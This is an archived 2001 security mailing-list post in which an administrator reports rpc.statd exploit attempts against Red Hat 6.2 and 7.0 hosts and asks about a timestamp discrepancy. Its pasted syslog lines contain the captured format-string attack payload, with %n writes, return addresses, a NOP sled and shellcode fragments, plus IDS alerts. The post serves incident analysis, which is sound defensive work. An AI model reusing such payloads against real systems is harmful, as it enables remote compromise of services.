Security Incidents mailing list archives
statd-exploit attack against RH 7.0
From: "Johan.Augustsson" <Johan.Augustsson () ADM GU SE>
Date: Wed, 10 Jan 2001 09:55:21 +0100
My apologies if this already have been discussed in this forum.We got a few attacks from scriptkiddies running some statd.x against our network and when I look at the messages in /var/log it looks different on a Red Hat 6.2 and 7.0 The thing thats annoys me is that at the Red Hat 7.0 the timestamp for the attack has turned one hour backwards. Has anyone else seen this?
/Johan Augustsson Red Hat 7.0 Jan 8 20:20:00 'system' some other eventJan 8 19:24:04 'system' rpc.statd[366]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n1Àë|YA^PA^HþÀA^DÃþÀ^A°fͳ^BY^LÆA^NÆA^H^PI^DA^D^L^A°fͳ^D°fͳ^E0ÀA^D°fÍÎÃ1É°?Í
Jan 8 20:25:00 'system' some other event Red Hat 6.2 Jan 8 19:31:39 'system' some other eventJan 8 20:05:57 'system' rpc.statd[356]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Jan 8 22:23:48 'system' some other event And the logs from the IDS2001-01-08 20:24:04 206.210.80.6 1088 -> 'Red Hat 7.0 111 IDS15 - RPC - portmap-request-status 2001-01-08 20:24:04 206.210.80.6 1088 -> 'Red Hat 7.0' 1025 IDS362 - MISC - Shellcode X86 NOPS-UDP 2001-01-08 20:05:57 206.210.80.6 1088 -> 'Red Hat 6.2' 111 IDS15 - RPC - portmap-request-status 2001-01-08 20:05:57 206.210.80.6 1088 -> 'Red Hat 6.2' 957 IDS362 - MISC - Shellcode X86 NOPS-UDP
Current thread:
- statd-exploit attack against RH 7.0 Johan.Augustsson (Jan 10)
- Message not available
- Re: statd-exploit attack against RH 7.0 Johan.Augustsson (Jan 11)
- Message not available